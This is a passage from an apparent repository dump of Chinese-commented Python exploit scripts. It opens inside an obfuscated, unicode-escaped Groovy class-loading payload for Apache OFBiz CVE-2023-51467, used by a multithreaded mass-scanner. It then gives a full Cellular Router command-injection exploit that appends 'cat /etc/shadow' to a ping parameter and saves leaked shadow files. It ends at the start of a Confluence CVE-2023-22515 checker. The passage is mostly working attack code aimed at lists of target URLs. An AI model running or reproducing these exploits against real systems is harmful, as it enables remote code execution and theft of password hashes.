0030\u005a\u0043\u0051\u0061\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u0051\u0055\u0031\u006b\u0045\u0041\u0037\u0067\u0041\u004a\u0031\u004e\u005a\u0042\u0052\u006b\u0051\u0076\u0072\u0067\u0041\u004a\u0031\u004f\u0032\u0041\u0042\u0039\u0058\u0047\u0051\u0036\u0032\u0041\u0041\u0051\u0053\u004c\u0067\u0053\u0039\u0041\u0042\u0078\u005a\u0041\u0078\u006b\u0052\u0055\u0037\u0059\u0041\u0048\u0052\u006b\u004f\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u0047\u0051\u006c\u0054\u0074\u0067\u0041\u0066\u0056\u0036\u0063\u0041\u0054\u007a\u006f\u0052\u004b\u0068\u0049\u0077\u0074\u0067\u0041\u0070\u004f\u0068\u0049\u005a\u0045\u0068\u0049\u0078\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0078\u0054\u0074\u0067\u0041\u0074\u0047\u0052\u0049\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u005a\u0045\u0046\u004f\u0032\u0041\u0042\u0038\u0036\u0043\u0052\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0034\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u005a\u0045\u006c\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u004a\u0055\u0037\u0059\u0041\u0048\u0031\u0065\u006e\u0041\u0041\u0036\u006e\u0041\u0041\u0055\u0036\u0043\u0049\u0051\u0047\u0041\u0061\u0066\u0039\u0070\u0037\u0045\u0041\u0042\u0077\u0043\u0067\u0041\u004b\u0073\u0041\u0072\u0067\u0041\u0053\u0041\u004d\u0034\u0041\u0033\u0041\u0044\u0066\u0041\u0042\u0049\u0042\u0078\u0041\u0049\u0077\u0041\u006a\u004d\u0041\u004c\u0077\u0041\u002f\u0041\u0045\u0051\u0043\u0068\u0051\u0041\u0076\u0041\u0045\u0063\u0041\u0059\u0067\u004b\u0046\u0041\u0043\u0038\u0041\u005a\u0051\u0043\u0046\u0041\u006f\u0055\u0041\u004c\u0077\u0043\u0049\u0041\u006e\u0038\u0043\u0068\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u004e\u0034\u0041\u004e\u0077\u0041\u0041\u0041\u0042\u0055\u0041\u0042\u0041\u0041\u0057\u0041\u0041\u0073\u0041\u0046\u0077\u0041\u0056\u0041\u0042\u0067\u0041\u0047\u0067\u0041\u005a\u0041\u0043\u0059\u0041\u0047\u0077\u0041\u002f\u0041\u0042\u0030\u0041\u0052\u0077\u0041\u0065\u0041\u0045\u0034\u0041\u0048\u0077\u0042\u006c\u0041\u0043\u0041\u0041\u0063\u0041\u0041\u0068\u0041\u0048\u0055\u0041\u0049\u0067\u0042\u0039\u0041\u0043\u004d\u0041\u0069\u0041\u0041\u006b\u0041\u004a\u004d\u0041\u004a\u0051\u0043\u0059\u0041\u0043\u0059\u0041\u006f\u0041\u0041\u006f\u0041\u004b\u0073\u0041\u004b\u0077\u0043\u0075\u0041\u0043\u006b\u0041\u0073\u0041\u0041\u0071\u0041\u004d\u0045\u0041\u004c\u0041\u0044\u0047\u0041\u0043\u0030\u0041\u007a\u0067\u0041\u0076\u0041\u004e\u0077\u0041\u004d\u0067\u0044\u0066\u0041\u0044\u0041\u0041\u0034\u0051\u0041\u0078\u0041\u004f\u0077\u0041\u004d\u0077\u0044\u0078\u0041\u0044\u0051\u0041\u002b\u0051\u0041\u0031\u0041\u0051\u0051\u0041\u004e\u0067\u0045\u004a\u0041\u0044\u0063\u0042\u0046\u0077\u0041\u0034\u0041\u0054\u004d\u0041\u004f\u0051\u0045\u002b\u0041\u0044\u006f\u0042\u0051\u0077\u0041\u0037\u0041\u0055\u0073\u0041\u0050\u0041\u0046\u006b\u0041\u0044\u0030\u0042\u0069\u0067\u0041\u002b\u0041\u0059\u0038\u0041\u0050\u0077\u0047\u0053\u0041\u0045\u0045\u0042\u006e\u0051\u0042\u0043\u0041\u0063\u0051\u0041\u0052\u0041\u0048\u004d\u0041\u0045\u0055\u0042\u0030\u0077\u0042\u0047\u0041\u0067\u0034\u0041\u0052\u0077\u0049\u0077\u0041\u0045\u0077\u0043\u004d\u0077\u0042\u0049\u0041\u006a\u0055\u0041\u0053\u0051\u0049\u0039\u0041\u0045\u006f\u0043\u0058\u0051\u0042\u004c\u0041\u006e\u0038\u0041\u0054\u0051\u004b\u0043\u0041\u0046\u0045\u0043\u0068\u0051\u0042\u0050\u0041\u006f\u0063\u0041\u0047\u0077\u004b\u004e\u0041\u0046\u004d\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0067\u0043\u0058\u0041\u0041\u004d\u0041\u006b\u0077\u0041\u0041\u0041\u0044\u006b\u0041\u0041\u0067\u0041\u0044\u0041\u0041\u0041\u0041\u0045\u0053\u0075\u0034\u0041\u0044\u004b\u0077\u0054\u0062\u0067\u0041\u0041\u0072\u0059\u0041\u004e\u0043\u0075\u0032\u0041\u0044\u0057\u0077\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0045\u0041\u0041\u0055\u0041\u004d\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0041\u004f\u0041\u0041\u004d\u0041\u0041\u0041\u0042\u0064\u0041\u0041\u0055\u0041\u0058\u0067\u0041\u0047\u0041\u0046\u0038\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u007a\u0041\u004a\u0067\u0041\u0041\u0041\u0041\u0043\u0041\u004a\u006b\u0041\u0041\u0051\u0043\u0061\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u002f\u0077\u0041\u0045\u0041\u0041\u0051\u0041\u0041\u0041\u0043\u0062\u004b\u0038\u0059\u0041\u0044\u0042\u0049\u0032\u004b\u0037\u0059\u0041\u004e\u0035\u006b\u0041\u0042\u0068\u0049\u0034\u0073\u0043\u0075\u0032\u0041\u0044\u006c\u004d\u004b\u0078\u0049\u0036\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u0037\u004b\u0069\u0075\u0033\u0041\u0044\u0077\u0053\u0050\u0062\u0059\u0041\u0050\u006b\u0030\u0073\u0076\u0067\u0057\u0066\u0041\u0041\u0059\u0053\u0050\u0037\u0041\u0071\u004c\u0041\u004d\u0079\u0074\u0051\u0042\u0041\u004b\u0069\u0077\u0045\u004d\u0072\u0067\u0041\u0051\u0062\u0067\u0041\u004a\u0037\u0055\u0041\u0051\u0072\u0073\u0041\u0051\u0031\u006b\u0071\u0074\u0077\u0042\u0045\u0054\u0069\u0032\u0032\u0041\u0045\u0055\u0053\u0052\u0072\u0041\u0072\u0045\u006b\u0065\u0032\u0041\u0044\u0075\u005a\u0041\u0043\u0049\u0071\u004b\u0037\u0063\u0041\u0050\u0042\u0049\u0039\u0074\u0067\u0041\u002b\u0054\u0053\u0079\u002b\u0042\u005a\u0038\u0041\u0042\u0068\u004a\u0049\u0073\u0043\u006f\u0073\u0041\u007a\u0049\u0073\u0042\u0044\u004b\u0032\u0041\u0045\u006d\u0077\u004b\u0078\u004a\u004b\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u004e\u004b\u0069\u006f\u0072\u0074\u0077\u0041\u0038\u0074\u0067\u0042\u004c\u0073\u0043\u006f\u0071\u004b\u0037\u0063\u0041\u0050\u004c\u0059\u0041\u0053\u0037\u0041\u0041\u0041\u0041\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0053\u0041\u0042\u0051\u0041\u0041\u0041\u0042\u0070\u0041\u0041\u0030\u0041\u0061\u0067\u0041\u0051\u0041\u0047\u0077\u0041\u0046\u0051\u0042\u0074\u0041\u0042\u0034\u0041\u0062\u0077\u0041\u0070\u0041\u0048\u0041\u0041\u004c\u0077\u0042\u0078\u0041\u0044\u0049\u0041\u0063\u0077\u0041\u0035\u0041\u0048\u0051\u0041\u0052\u0067\u0042\u0031\u0041\u0045\u0038\u0041\u0064\u0067\u0042\u0054\u0041\u0048\u0063\u0041\u0056\u0067\u0042\u0034\u0041\u0046\u0038\u0041\u0065\u0051\u0042\u0071\u0041\u0048\u006f\u0041\u0063\u0041\u0042\u0037\u0041\u0048\u004d\u0041\u0066\u0051\u0042\u002b\u0041\u0048\u0034\u0041\u0068\u0077\u0042\u002f\u0041\u004a\u0045\u0041\u0067\u0051\u0041\u0042\u0041\u004a\u0077\u0041\u006e\u0051\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0042\u0032\u0041\u0041\u004d\u0041\u0042\u0051\u0041\u0041\u0041\u0044\u0061\u0037\u0041\u0045\u0078\u005a\u004b\u0037\u0063\u0041\u0054\u0055\u0036\u0037\u0041\u0045\u0035\u005a\u004c\u0062\u0063\u0041\u0054\u007a\u006f\u0045\u0047\u0051\u0051\u0073\u0075\u0041\u0042\u0051\u0074\u0067\u0042\u0052\u0047\u0051\u0053\u0032\u0041\u0046\u0049\u005a\u0042\u004c\u0059\u0041\u0055\u0036\u0063\u0041\u0043\u007a\u006f\u0045\u0047\u0051\u0053\u0032\u0041\u0046\u0053\u0077\u004c\u0062\u0059\u0041\u0056\u0062\u0041\u0041\u0041\u0051\u0041\u004a\u0041\u0043\u0059\u0041\u004b\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0043\u0059\u0041\u0043\u0051\u0041\u0041\u0041\u0049\u0077\u0041\u0043\u0051\u0043\u004f\u0041\u0042\u004d\u0041\u006a\u0077\u0041\u0063\u0041\u004a\u0041\u0041\u0049\u0051\u0043\u0052\u0041\u0043\u0059\u0041\u006c\u0041\u0041\u0070\u0041\u004a\u0049\u0041\u004b\u0077\u0043\u0054\u0041\u0044\u0045\u0041\u006c\u0051\u0041\u0043\u0041\u004a\u0034\u0041\u006d\u0077\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0041\u0076\u0041\u0041\u004d\u0041\u0041\u0067\u0041\u0041\u0041\u0042\u0063\u0072\u0045\u006a\u006f\u0053\u004e\u0072\u0059\u0041\u0056\u0068\u004a\u004b\u0045\u006a\u0061\u0032\u0041\u0046\u0059\u0053\u0052\u0078\u0049\u0032\u0074\u0067\u0042\u0057\u0073\u0041\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u0059\u0041\u0041\u0051\u0041\u0041\u0041\u004a\u0034\u0041\u0041\u0051\u0043\u0066\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0042\u0078\u0077\u0041\u0045\u0041\u0041\u006b\u0041\u0041\u0041\u0045\u006e\u0045\u006c\u0065\u0034\u0041\u0046\u0069\u0032\u0041\u0046\u006c\u004e\u004b\u0037\u0059\u0041\u004f\u0055\u0077\u0042\u0054\u0069\u0077\u0053\u0057\u0072\u0059\u0041\u0044\u004a\u006b\u0041\u0051\u0043\u0073\u0053\u0057\u0037\u0059\u0041\u0044\u004a\u006b\u0041\u0049\u0043\u0073\u0053\u0058\u004c\u0059\u0041\u0044\u004a\u006f\u0041\u0046\u0037\u0073\u0041\u0058\u0056\u006d\u0033\u0041\u0046\u0034\u0072\u0074\u0067\u0042\u0066\u0045\u006d\u0043\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0046\u004d\u0042\u0072\u0030\u0041\u0049\u0056\u006b\u0044\u0045\u0069\u004a\u0054\u0057\u0051\u0051\u0053\u0059\u006c\u004e\u005a\u0042\u0053\u0074\u0054\u004f\u0067\u0053\u006e\u0041\u0044\u0030\u0072\u0045\u006c\u0075\u0032\u0041\u0041\u0079\u005a\u0041\u0043\u0041\u0072\u0045\u006c\u0079\u0032\u0041\u0041\u0079\u0061\u0041\u0042\u0065\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u004b\u0037\u0059\u0041\u0058\u0078\u004a\u006a\u0074\u0067\u0042\u0066\u0074\u0067\u0042\u0068\u0054\u0041\u0061\u0039\u0041\u0043\u0046\u005a\u0041\u0078\u004a\u006b\u0055\u0031\u006b\u0045\u0045\u006d\u0056\u0054\u0057\u0051\u0055\u0072\u0055\u007a\u006f\u0045\u0075\u0041\u0042\u006d\u0047\u0051\u0053\u0032\u0041\u0047\u0064\u004f\u0075\u0077\u0042\u006f\u0057\u0053\u0032\u0032\u0041\u0047\u006d\u0033\u0041\u0047\u006f\u0053\u0061\u0037\u0059\u0041\u0062\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0047\u0032\u005a\u0041\u0041\u0073\u005a\u0042\u0062\u0059\u0041\u0062\u0071\u0063\u0041\u0042\u0052\u0049\u0032\u004f\u0067\u0061\u0037\u0041\u0047\u0068\u005a\u004c\u0062\u0059\u0041\u0062\u0037\u0063\u0041\u0061\u0068\u004a\u0072\u0074\u0067\u0042\u0073\u004f\u0067\u0057\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u0047\u0051\u0061\u0032\u0041\u0046\u0038\u005a\u0042\u0062\u0059\u0041\u0062\u005a\u006b\u0041\u0043\u0078\u006b\u0046\u0074\u0067\u0042\u0075\u0070\u0077\u0041\u0046\u0045\u006a\u0061\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0045\u0036\u0042\u0068\u006b\u0047\u004f\u0067\u0063\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0048\u0073\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0046\u0051\u0036\u0042\u0069\u0033\u0047\u0041\u0041\u0063\u0074\u0074\u0067\u0042\u0077\u0047\u0051\u0061\u0077\u004f\u0067\u0067\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0049\u0076\u0077\u0041\u0045\u0041\u004a\u0041\u0041\u002b\u0077\u0045\u0047\u0041\u0043\u0038\u0041\u006b\u0041\u0044\u0037\u0041\u0052\u006f\u0041\u0041\u0041\u0045\u0047\u0041\u0051\u0038\u0042\u0047\u0067\u0041\u0041\u0041\u0052\u006f\u0042\u0048\u0041\u0045\u0061\u0041\u0041\u0041\u0041\u0041\u0051\u0043\u0055\u0041\u0041\u0041\u0041\u0062\u0067\u0041\u0062\u0041\u0041\u0041\u0041\u0070\u0077\u0041\u004a\u0041\u004b\u0067\u0041\u0044\u0067\u0043\u0070\u0041\u0042\u0041\u0041\u0071\u0077\u0041\u005a\u0041\u004b\u0077\u0041\u004b\u0077\u0043\u0074\u0041\u0044\u0038\u0041\u0072\u0077\u0042\u0057\u0041\u004c\u0045\u0041\u0061\u0041\u0043\u0079\u0041\u0048\u0077\u0041\u0074\u0041\u0043\u0051\u0041\u004c\u0063\u0041\u006d\u0051\u0043\u0034\u0041\u004b\u0073\u0041\u0075\u0051\u0043\u002f\u0041\u004c\u006f\u0041\u0030\u0051\u0043\u0037\u0041\u0050\u0063\u0041\u0076\u0041\u0044\u0037\u0041\u004d\u0041\u0041\u002f\u0077\u0044\u0042\u0041\u0051\u004d\u0041\u0076\u0041\u0045\u0047\u0041\u004c\u0030\u0042\u0043\u0041\u0043\u002b\u0041\u0051\u0038\u0041\u0077\u0041\u0045\u0054\u0041\u004d\u0045\u0042\u0046\u0077\u0043\u002b\u0041\u0052\u006f\u0041\u0077\u0041\u0045\u0067\u0041\u004d\u0045\u0042\u004a\u0041\u0044\u0044\u0041\u0041\u0045\u0041\u006f\u0041\u0043\u0068\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0056\u006b\u0041\u0042\u0041\u0041\u004d\u0041\u0041\u0041\u0041\u0079\u0052\u004a\u0058\u0075\u0041\u0042\u0059\u0074\u0067\u0042\u005a\u0045\u006c\u0071\u0032\u0041\u0041\u0079\u0061\u0041\u0041\u006b\u0053\u0063\u0055\u0036\u006e\u0041\u0041\u0059\u0053\u0063\u006b\u0036\u0034\u0041\u0047\u0059\u0074\u0074\u0067\u0042\u007a\u004f\u0067\u0053\u0037\u0041\u0048\u0052\u005a\u004b\u0078\u0079\u0033\u0041\u0048\u0055\u0036\u0042\u0052\u006b\u0045\u0074\u0067\u0042\u0070\u004f\u0067\u0059\u005a\u0042\u004c\u0059\u0041\u0062\u007a\u006f\u0048\u0047\u0051\u0057\u0032\u0041\u0048\u0059\u0036\u0043\u0042\u006b\u0045\u0074\u0067\u0042\u0033\u004f\u0067\u006b\u005a\u0042\u0062\u0059\u0041\u0065\u0044\u006f\u004b\u0047\u0051\u0057\u0032\u0041\u0048\u006d\u0061\u0041\u0047\u0041\u005a\u0042\u0072\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0061\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0042\u0037\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0065\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u004c\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004a\u0047\u0051\u0069\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u0072\u0059\u0041\u0066\u0052\u006b\u004a\u0074\u0067\u0042\u0039\u0046\u0041\u0042\u002b\u0075\u0041\u0043\u0041\u0047\u0051\u0053\u0032\u0041\u0049\u0046\u0058\u0070\u0077\u0041\u0049\u004f\u0067\u0075\u006e\u002f\u0035\u0034\u005a\u0042\u004c\u0059\u0041\u0063\u0042\u006b\u0046\u0074\u0067\u0043\u0043\u0070\u0077\u0041\u004a\u0054\u0069\u0032\u0032\u0041\u0049\u004e\u0058\u0073\u0051\u0041\u0043\u0041\u004b\u0063\u0041\u0072\u0051\u0043\u0077\u0041\u0043\u0038\u0041\u0041\u0041\u0043\u002f\u0041\u004d\u0049\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0075\u0041\u0042\u0073\u0041\u0041\u0041\u0044\u0050\u0041\u0042\u0041\u0041\u0030\u0041\u0041\u0057\u0041\u004e\u0049\u0041\u0047\u0051\u0044\u0055\u0041\u0043\u0049\u0041\u0031\u0051\u0041\u0074\u0041\u004e\u0059\u0041\u0051\u0067\u0044\u0058\u0041\u0046\u0041\u0041\u0032\u0041\u0042\u0059\u0041\u004e\u006b\u0041\u0059\u0041\u0044\u0061\u0041\u0047\u0030\u0041\u0033\u0041\u0042\u0031\u0041\u004e\u0030\u0041\u0067\u0067\u0044\u0066\u0041\u0049\u006f\u0041\u0034\u0041\u0043\u0058\u0041\u004f\u0049\u0041\u006e\u0041\u0044\u006a\u0041\u004b\u0045\u0041\u0035\u0041\u0043\u006e\u0041\u004f\u0059\u0041\u0072\u0051\u0044\u006e\u0041\u004c\u0041\u0041\u0036\u0041\u0043\u0079\u0041\u004f\u006b\u0041\u0074\u0051\u0044\u0072\u0041\u004c\u006f\u0041\u0037\u0041\u0043\u002f\u0041\u004f\u0038\u0041\u0077\u0067\u0044\u0074\u0041\u004d\u004d\u0041\u0037\u0067\u0044\u0049\u0041\u0050\u0041\u0041\u0041\u0051\u0043\u0069\u0041\u004a\u0049\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u004c\u0041\u0041\u0044\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0051\u004b\u0069\u0071\u0030\u0041\u0045\u0041\u0071\u0074\u0041\u0042\u0043\u0074\u0067\u0043\u0045\u0074\u0067\u0043\u0046\u0073\u0051\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u006f\u0041\u0041\u0067\u0041\u0041\u0041\u0050\u0051\u0041\u0044\u0077\u0044\u0031\u0041\u0041\u006b\u0041\u006f\u0077\u0043\u006b\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0052\u0077\u0041\u0042\u0067\u0041\u0045\u0041\u0041\u0041\u0041\u0072\u0041\u0046\u004d\u0045\u006f\u0061\u0034\u0041\u0044\u004a\u004e\u004c\u0042\u004b\u0048\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0046\u0054\u0074\u0067\u0041\u0064\u004c\u004c\u0059\u0041\u004b\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0079\u0070\u0054\u0074\u0067\u0041\u0066\u0077\u0041\u0041\u0073\u0077\u0041\u0041\u0073\u0054\u004b\u0063\u0041\u0042\u0045\u0030\u0072\u0078\u0077\u0042\u0044\u0045\u006f\u0069\u0034\u0041\u0044\u0049\u0053\u0069\u0051\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u0042\u0041\u0037\u0030\u0041\u0048\u0072\u0059\u0041\u0048\u0030\u0030\u0073\u0074\u0067\u0041\u0045\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u0073\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u004b\u006c\u004f\u0032\u0041\u0042\u002f\u0041\u0041\u0043\u007a\u0041\u0041\u0043\u0078\u004d\u0070\u0077\u0041\u0045\u0054\u0053\u0076\u0048\u0041\u0044\u0051\u0053\u0069\u0037\u0067\u0041\u004d\u006b\u0030\u0073\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0031\u004f\u004c\u0053\u0079\u0032\u0041\u0043\u006f\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0071\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u004c\u004d\u0041\u0041\u004c\u0045\u0079\u006e\u0041\u0041\u0052\u004e\u004b\u0037\u0041\u0041\u0041\u0077\u0041\u0043\u0041\u0043\u0030\u0041\u004d\u0041\u0041\u0076\u0041\u0044\u0055\u0041\u0063\u0051\u0042\u0030\u0041\u0043\u0038\u0041\u0065\u0051\u0043\u006d\u0041\u004b\u006b\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0047\u0041\u0042\u0045\u0041\u0041\u0041\u0044\u0039\u0041\u0041\u0049\u0041\u002f\u0077\u0041\u0049\u0041\u0051\u0041\u0041\u004c\u0051\u0045\u0044\u0041\u0044\u0041\u0042\u0041\u0051\u0041\u0078\u0041\u0051\u0051\u0041\u004e\u0051\u0045\u0047\u0041\u0045\u0077\u0042\u0042\u0077\u0042\u0078\u0041\u0051\u006f\u0041\u0064\u0041\u0045\u0049\u0041\u0048\u0055\u0042\u0044\u0041\u0042\u0035\u0041\u0051\u0034\u0041\u0066\u0077\u0045\u0050\u0041\u0049\u0038\u0042\u0045\u0041\u0043\u006d\u0041\u0052\u004d\u0041\u0071\u0051\u0045\u0052\u0041\u004b\u006f\u0042\u0046\u0051\u0041\u0042\u0041\u004b\u0055\u0041\u0041\u0041\u0041\u0043\u0041\u004b\u0059\u003d\u005c\u0022\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0022\u0029\u003b"}
18 | 
19 | 		res = requests.post(vulnurl, headers=headers, data=payload, verify=False, timeout=30)
20 | 		res.encoding = "utf-8"
21 | 		if res.status_code == 200 and "uid=" in res.text:
22 | 			print(f"目标URL: {url} ")
23 | 			with open(success_file, 'a') as s_file:
24 | 				s_file.write("=" * 65 + "\n")
25 | 				s_file.write(f"目标URL: {url}\n")
26 | 				s_file.write("响应内容: {}\n\n".format(res.text.split('\n')[0]))
27 | 			return True
28 | 	except Exception as e:
29 | 		print(f"发生异常：{e}")
30 | 		return False
31 | 
32 | def scan_targets(targets, proxies=None, success_file=None):
33 | 	for target in targets:
34 | 		target = target.strip()
35 | 		check_for_vulnerability(target, proxies, success_file)
36 | 
37 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
38 | 	threads = []
39 | 
40 | 	for i in range(num_threads):
41 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
42 | 		threads.append(thread)
43 | 
44 | 	for thread in threads:
45 | 		thread.start()
46 | 
47 | 	for thread in threads:
48 | 		thread.join()
49 | 
50 | if __name__ == '__main__':
51 | 	parser = argparse.ArgumentParser(description="Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467")
52 | 	parser.add_argument("-u", "--url", help="目标URL")
53 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
54 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
55 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
56 | 	args = parser.parse_args()
57 | 
58 | 	if not args.url and not args.file:
59 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
60 | 		exit(1)
61 | 
62 | 	if args.url:
63 | 		urls = [args.url]
64 | 	elif args.file:
65 | 		with open(args.file, 'r') as file:
66 | 			urls = file.readlines()
67 | 
68 | 	success_file = 'success_targets.txt'
69 | 
70 | 	proxies = {
71 | 		"http": args.proxy,
72 | 		"https": args.proxy
73 | 	} if args.proxy else None
74 | 
75 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
76 | 
77 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
78 | 


--------------------------------------------------------------------------------
/Cellular_rce_exp.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-9-22
 3 | 
 4 | import requests
 5 | import argparse
 6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 7 | 
 8 | def check_for_vulnerability(url, proxies={}, success_file=None):
 9 |     headers = {
10 |         'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69',
11 |         'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
12 |         'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
13 |         'Accept-Encoding':'gzip, deflate',
14 |         'Upgrade-Insecure-Requests':'1',
15 |         'Sec-Fetch-Dest':'document',
16 |         'Sec-Fetch-Mode':'navigate',
17 |         'Sec-Fetch-Site':'none',
18 |         'Sec-Fetch-User':'?1',
19 |         'Te':'trailers',
20 |         'Connection':'close'
21 |     }
22 |     try:
23 |         response = requests.get(url + '/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912', headers=headers, proxies=proxies, verify=False, timeout=30)
24 |         if response.status_code == 200 and "root:" in response.text:
25 |             with open(success_file, 'a') as s_file:
26 |                 s_file.write(f"++++++++++++++++++\n")
27 |                 s_file.write(f"目标URL: {url}\n")
28 |                 s_file.write(f"Payload: ping -c 4 1.1.1.1;cat /etc/shadow&v=0.1303033443137912\n")
29 |                 s_file.write(f"响应内容:\n{response.text}\n\n")
30 |             return True
31 |     except Exception as e:
32 |         print(f"发生异常：{e}")
33 |     return False
34 | 
35 | def scan_targets(targets, proxies={}, success_file=None):
36 |     for target in targets:
37 |         target = target.strip()
38 |         check_for_vulnerability(target, proxies, success_file)
39 | 
40 | if __name__ == '__main__':
41 |     parser = argparse.ArgumentParser(description="移动路由器 Cellular Router 命令执行漏洞")
42 |     parser.add_argument("-u", "--url", help="目标URL")
43 |     parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
44 |     args = parser.parse_args()
45 | 
46 |     if not args.url and not args.file:
47 |         print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
48 |         exit(1)
49 | 
50 |     if args.url:
51 |         urls = [args.url]
52 |     elif args.file:
53 |         with open(args.file, 'r') as file:
54 |             urls = file.readlines()
55 | 
56 |     proxies = {
57 | 
58 |         }
59 |     success_file = 'success_targets.txt'
60 | 
61 |     for url in urls:
62 |         url = url.strip()
63 |         scan_targets([url], proxies, success_file)
64 | 
65 |     print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
66 | 


--------------------------------------------------------------------------------
/Confluence_CVE-2023-22515_Checker.py:
--------------------------------------------------------------------------------
  1 | # 作者: VulnExpo
  2 | # 日期: 2023-10-20
  3 | 
  4 | import re
  5 | import requests
  6 | import argparse
  7 | from urllib.parse import urlparse
  8 | from requests.exceptions import RequestException
  9 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 10 | 
 11 | def check_for_vulnerability(url, proxies={}, success_file=None):
 12 |     SERVER_INFO_URI = '/server-info.action'
